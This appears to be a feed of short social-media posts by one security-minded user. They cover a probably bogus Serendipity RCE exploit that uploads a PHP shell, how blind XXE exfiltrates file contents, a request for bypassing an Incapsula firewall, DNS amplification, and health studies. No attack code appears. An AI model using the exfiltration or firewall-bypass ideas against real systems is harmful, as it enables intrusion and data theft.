npub1syue...3cq9 1 month ago

I've recently stumbled upon an RCE "exploit" for the Serendipity blog software, which I happen to use and have contributed to in the past. From what I can tell, it does nothing interesting (it does not even work due to broken indents, if one fixes that it uploads a PHP shell given existing credentials, but that won't be executed unless you have a server config that executes .inc files). I'm 95% certain this is bogus. Yet... in case anyone wants to have a look:

GitHub

Exploit (probably bogus) on exploit-db · Issue #940 · s9y/Serendipity

I stumbled upon this: https://www.exploit-db.com/exploits/52036 This claims to be a remote code execution exploit for serendipity. I believe it is ...

npub1syue...3cq9 3 months ago

Dear Infosec people who have looked at XML and XXE before: I am trying to get an understanding of Blind XXE. Many of the descriptions I find are lacking an important detail which makes the attack much less practical. Blind XXE works by building an URL which contains content of a file, allowing to exfiltrate content. However, in all my tests, that *only* works if the file contains no newlines, as those are not allowed in URLs. Am I missing something? 🧵

npub1syue...3cq9 3 months ago

There's a study indicating that a cheap nasal spray that is already on the market (for allergies) can reduce Covid 19 infection risk by ~2/3rd, and also reduce other respiratorial infections. I'm somewhat torn between "too good to be true" and "any reason I shouldn't immediately buy and use this?" Anyone read any insightful (and particularly: skeptical, caveats) takes on it? https://jamanetwork.com/journals/jamainternalmedicine/fullarticle/2838335

npub1syue...3cq9 4 months ago

Anyone happens to know if there's any easy trick to bypass an Incapsula "security firewall" that thinks downloading with curl/wget is an attack to be prevented? (It's not just the user agent, I tried that.)

npub1syue...3cq9 5 months ago

In case I know anyone here who's familiar with the finer details of DNS and particularly DNS amplification attacks and their mitigations, I have some questions.

npub1syue...3cq9 5 months ago

I went down a rabbit hole trying to understand some health issues, and I ended up with an idea for a study that involves Espresso and heart disease risks that would be relatively easy to perform and could help make more informed health decisions. My journey (and this is only one tiny aspect, I've been thinking about this a lot) started a bit more than a year ago when I got a blood test as part of a health checkup that contained some concerning values, notably high glucose and high LDL. 🧵